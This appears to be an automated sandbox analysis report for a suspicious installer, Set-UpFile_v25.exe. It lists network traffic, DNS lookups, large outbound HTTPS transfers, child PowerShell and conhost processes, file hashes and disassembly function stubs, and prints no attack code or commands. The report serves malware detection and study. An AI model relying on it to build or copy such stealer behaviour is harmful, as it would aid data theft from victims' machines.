Jan 7, 2025 14:37:21.789366961 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:21.789383888 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:22.303819895 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.303870916 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:22.303960085 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.304264069 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.304277897 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:22.773472071 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:22.773652077 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.775212049 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.775224924 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:22.775470972 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:22.776906967 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.777043104 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:22.777076006 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:23.549746037 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:23.549855947 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:23.549932003 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:23.595263004 CET | 49754 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:23.595335960 CET | 443 | 49754 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:23.878432989 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:23.878473997 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:23.878544092 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:23.943556070 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:23.943584919 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.415503979 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.415568113 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:24.417109013 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:24.417119026 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.417362928 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.418783903 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:24.418927908 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:24.418932915 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.859766006 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.859910011 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:24.859961987 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:24.860280037 CET | 49755 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:24.860295057 CET | 443 | 49755 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:25.576251984 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:25.576284885 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:25.576360941 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:25.576730967 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:25.576744080 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.047687054 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.047768116 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.049245119 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.049251080 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.049484015 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.051048994 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.051904917 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.051933050 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.052347898 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.052373886 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.052474022 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.052489042 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.053055048 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.053071022 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.053195953 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.053217888 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.053375959 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.053392887 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.053402901 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.053520918 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.053541899 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.062611103 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.062872887 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.062891006 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.062907934 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.062963963 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.063002110 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.063158035 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.063361883 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.063391924 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:26.063402891 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:26.068228006 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:27.658402920 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:27.658498049 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:27.658566952 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:27.658850908 CET | 49756 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:27.658864975 CET | 443 | 49756 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:27.688219070 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:27.688271046 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:27.688366890 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:27.688714027 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:27.688726902 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.145315886 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.145395041 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.150253057 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.150280952 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.150542974 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.152039051 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.152071953 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.152136087 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.640237093 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.640336990 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.640408993 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.640670061 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.640693903 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.640707016 CET | 49757 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:28.640717983 CET | 443 | 49757 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:28.750890017 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:28.750922918 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:28.750992060 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:28.751362085 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:28.751374960 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.414772987 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.414834976 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:29.416871071 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:29.416881084 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.417114019 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.418895960 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:29.459341049 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.681477070 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.681539059 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.681587934 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:29.681807041 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:29.681827068 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Jan 7, 2025 14:37:29.681839943 CET | 49758 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 7, 2025 14:37:29.681845903 CET | 443 | 49758 | 185.161.251.21 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 7, 2025 14:37:11.142642021 CET | 63481 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 7, 2025 14:37:11.162782907 CET | 53 | 63481 | 1.1.1.1 | 192.168.2.4 |
Jan 7, 2025 14:37:28.644005060 CET | 57106 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 7, 2025 14:37:28.750129938 CET | 53 | 57106 | 1.1.1.1 | 192.168.2.4 |
Jan 7, 2025 14:37:29.705832005 CET | 50957 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 7, 2025 14:37:29.715138912 CET | 53 | 50957 | 1.1.1.1 | 192.168.2.4 |
Jan 7, 2025 14:37:30.804349899 CET | 58658 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 7, 2025 14:37:30.818614006 CET | 53 | 58658 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 7, 2025 14:37:11.142642021 CET | 192.168.2.4 | 1.1.1.1 | 0x611 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:37:28.644005060 CET | 192.168.2.4 | 1.1.1.1 | 0xd62a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:37:29.705832005 CET | 192.168.2.4 | 1.1.1.1 | 0xc8b6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:37:30.804349899 CET | 192.168.2.4 | 1.1.1.1 | 0x7106 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 7, 2025 14:37:11.162782907 CET | 1.1.1.1 | 192.168.2.4 | 0x611 | No error (0) | 104.21.25.52 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:37:11.162782907 CET | 1.1.1.1 | 192.168.2.4 | 0x611 | No error (0) | 172.67.222.183 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:37:28.750129938 CET | 1.1.1.1 | 192.168.2.4 | 0xd62a | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:37:29.715138912 CET | 1.1.1.1 | 192.168.2.4 | 0xc8b6 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:37:30.818614006 CET | 1.1.1.1 | 192.168.2.4 | 0x7106 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:11 UTC | 263 | OUT | |
2025-01-07 13:37:11 UTC | 8 | OUT | |
2025-01-07 13:37:12 UTC | 1123 | IN | |
2025-01-07 13:37:12 UTC | 7 | IN | |
2025-01-07 13:37:12 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:12 UTC | 264 | OUT | |
2025-01-07 13:37:12 UTC | 78 | OUT | |
2025-01-07 13:37:13 UTC | 1123 | IN | |
2025-01-07 13:37:13 UTC | 246 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN | |
2025-01-07 13:37:13 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49750 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:13 UTC | 275 | OUT | |
2025-01-07 13:37:13 UTC | 15331 | OUT | |
2025-01-07 13:37:13 UTC | 2789 | OUT | |
2025-01-07 13:37:14 UTC | 1129 | IN | |
2025-01-07 13:37:14 UTC | 20 | IN | |
2025-01-07 13:37:14 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49751 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:15 UTC | 280 | OUT | |
2025-01-07 13:37:15 UTC | 8777 | OUT | |
2025-01-07 13:37:15 UTC | 1125 | IN | |
2025-01-07 13:37:15 UTC | 20 | IN | |
2025-01-07 13:37:15 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49752 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:16 UTC | 275 | OUT | |
2025-01-07 13:37:16 UTC | 15331 | OUT | |
2025-01-07 13:37:16 UTC | 5063 | OUT | |
2025-01-07 13:37:21 UTC | 1124 | IN | |
2025-01-07 13:37:21 UTC | 20 | IN | |
2025-01-07 13:37:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49754 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:22 UTC | 278 | OUT | |
2025-01-07 13:37:22 UTC | 7111 | OUT | |
2025-01-07 13:37:23 UTC | 1131 | IN | |
2025-01-07 13:37:23 UTC | 20 | IN | |
2025-01-07 13:37:23 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:24 UTC | 279 | OUT | |
2025-01-07 13:37:24 UTC | 1241 | OUT | |
2025-01-07 13:37:24 UTC | 1130 | IN | |
2025-01-07 13:37:24 UTC | 20 | IN | |
2025-01-07 13:37:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:26 UTC | 275 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:26 UTC | 15331 | OUT | |
2025-01-07 13:37:27 UTC | 1135 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:28 UTC | 265 | OUT | |
2025-01-07 13:37:28 UTC | 113 | OUT | |
2025-01-07 13:37:28 UTC | 1128 | IN | |
2025-01-07 13:37:28 UTC | 218 | IN | |
2025-01-07 13:37:28 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:37:29 UTC | 201 | OUT | |
2025-01-07 13:37:29 UTC | 249 | IN | |
2025-01-07 13:37:29 UTC | 329 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 08:36:59 |
Start date: | 07/01/2025 |
Path: | C:\Users\user\Desktop\Set-UpFile_v25.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 75'060'322 bytes |
MD5 hash: | 2F33775C502E7B2D60B9BFE944B46863 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | Borland Delphi |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 4 |
Start time: | 08:37:29 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfa0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 08:37:29 |
Start date: | 07/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 1.6% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 31.6% |
Total number of Nodes: | 117 |
Total number of Limit Nodes: | 11 |
Graph
Function 029D2D35 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 02980375 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399threadCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 02980935 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029D39B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029D2605 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299FDC2 Relevance: 77.4, Strings: 61, Instructions: 1164COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029928C9 Relevance: 13.3, Strings: 10, Instructions: 839COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029934B7 Relevance: 11.8, Strings: 9, Instructions: 564COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029A3B42 Relevance: 11.7, Strings: 9, Instructions: 472COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029BD522 Relevance: 10.9, Strings: 8, Instructions: 923COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0298B2C2 Relevance: 10.4, Strings: 8, Instructions: 387COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029BCBC2 Relevance: 10.3, Strings: 8, Instructions: 312COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0298ADD2 Relevance: 7.9, Strings: 6, Instructions: 427COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0298AB12 Relevance: 7.8, Strings: 6, Instructions: 263COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0298E6BD Relevance: 7.6, Strings: 6, Instructions: 149COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 02985AF2 Relevance: 6.7, Strings: 5, Instructions: 478COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299BFC2 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029C0F72 Relevance: 5.6, Strings: 4, Instructions: 592COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299DDE9 Relevance: 5.2, Strings: 4, Instructions: 229COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029A4292 Relevance: 4.3, Strings: 3, Instructions: 509COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0298C8E2 Relevance: 4.1, Strings: 3, Instructions: 396COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299E0FA Relevance: 4.1, Strings: 3, Instructions: 392COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299B442 Relevance: 3.4, Strings: 2, Instructions: 880COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299A3F0 Relevance: 2.9, Strings: 2, Instructions: 378COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299D955 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 02993CCF Relevance: 2.7, Strings: 2, Instructions: 221COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 02990C22 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 0299C4EB Relevance: 1.7, Strings: 1, Instructions: 495COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029AA872 Relevance: 1.7, Strings: 1, Instructions: 420COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029AFBD2 Relevance: 1.7, Strings: 1, Instructions: 411COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029BE2C2 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029A966A Relevance: 1.6, Strings: 1, Instructions: 353COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029C4442 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029C4DE2 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Function 029AD811 Relevance: 1.6, Strings: 1, Instructions: 310COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
